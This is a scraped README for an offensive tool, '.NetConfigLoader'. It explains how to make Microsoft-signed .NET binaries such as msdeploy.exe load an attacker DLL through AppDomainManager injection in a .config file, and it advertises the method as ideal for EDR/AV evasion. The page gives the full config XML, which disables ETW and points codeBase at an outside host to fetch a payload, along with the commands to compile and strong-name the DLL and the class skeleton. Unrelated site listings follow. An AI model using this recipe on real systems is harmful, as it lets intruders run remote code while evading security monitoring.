.NetConfigLoader
.net config loader
Install / Use
/learn @Mr-Un1k0d3r/.NetConfigLoaderREADME
.NetConfigLoader
List of .Net application signed by Microsoft that can be used to load a dll via a .config file. Ideal for EDR/AV evasion and execution policy bypass.
<configuration>
<runtime>
<assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
<dependentAssembly>
<assemblyIdentity name="DLLNAME" publicKeyToken="deadbeef1337" culture="neutral" />
<codeBase version="0.0.0.0" href="https://mr.un1k0d3r.world/payload"/>
</dependentAssembly>
</assemblyBinding>
<etwEnable enabled="false" />
<appDomainManagerAssembly value="DLLNAME, Version=0.0.0.0, Culture=neutral, PublicKeyToken=deadbeef1337" />
<appDomainManagerType value="CLASSNAME" />
</runtime>
</configuration>
Example:
msdeploy.exe you need to create msdeploy.exe.config and add the XML data provided above.
List of .Net Signed Microsoft Binaries
952 files on my system. List here: Signed Binaries
Compiling the DLL
The DLL needs to have strong name
sn.exe -k key.snk
csc.exe /t:library /keyfile:key.snk /out:my.dll Program.cs
Getting the strong name information for the .config file
PS> [System.Reflection.AssemblyName]::GetAssemblyName("C:\full\path\to\dll\my.dll").FullName
The DLL Structure
using System;
public sealed class CLASSNAME : AppDomainManager
{
public override void InitializeNewDomain(AppDomainSetup appDomainInfo)
{
Program.Main(null);
return;
}
}
Related Skills
node-connect
349.9kDiagnose OpenClaw node connection and pairing failures for Android, iOS, and macOS companion apps
frontend-design
109.8kCreate distinctive, production-grade frontend interfaces with high design quality. Use this skill when the user asks to build web components, pages, or applications. Generates creative, polished code that avoids generic AI aesthetics.
openai-whisper-api
349.9kTranscribe audio via OpenAI Audio Transcriptions API (Whisper).
qqbot-media
349.9kQQBot 富媒体收发能力。使用 <qqmedia> 标签,系统根据文件扩展名自动识别类型(图片/语音/视频/文件)。
Security Score
Audited on Mar 11, 2026
